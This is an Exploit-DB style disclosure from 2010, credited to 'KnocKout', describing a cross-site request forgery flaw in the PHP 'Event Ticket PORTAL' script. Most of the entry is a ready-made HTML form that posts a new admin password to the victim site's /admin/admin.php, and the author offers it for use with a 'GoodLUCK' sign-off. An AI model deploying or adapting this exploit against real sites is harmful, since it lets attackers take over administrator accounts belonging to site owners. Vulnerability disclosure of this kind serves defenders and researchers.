Event Ticket Portal Script Admin Password Change - Cross-Site Request Forgery

EDB-ID:

15281

CVE:

N/A


Author:

KnocKout

Type:

webapps


Platform:

PHP

Date:

2010-10-19


===========================================================
Event Ticket PORTAL <= Admin Password Change (CSRF) Exploit
===========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Event Ticket PORTAL
|~Price : 149 Euro
|~Version : N/A
|~Software: http://www.tourismscripts.com
|~Vulnerability Style : CSRF
|~Vulnerability Dir : /admin
|~Google Keyword : N/A
|[~]Date : "18.10.2010"
|[~]Tested on : (L):Vista (R):Demo
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#########################################################
the target can be changed according to
<form method="post" action="http://VICTIM/admin/admin.php">
########################################################

    ~~~~~~~~ Explotation| Exploit.HTML ~~~~~~~~~~~
    
========(CSRF) Html Exploit=========

<h3>Event Ticket PORTAL - Admin Password Chage (CSRF) Exploited by KnocKout</h3>
<table>
<tr>
<form method="post" action="http://server/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>

</table>


========(CSRF) Html Exploit=========
    
     GoodLUCK.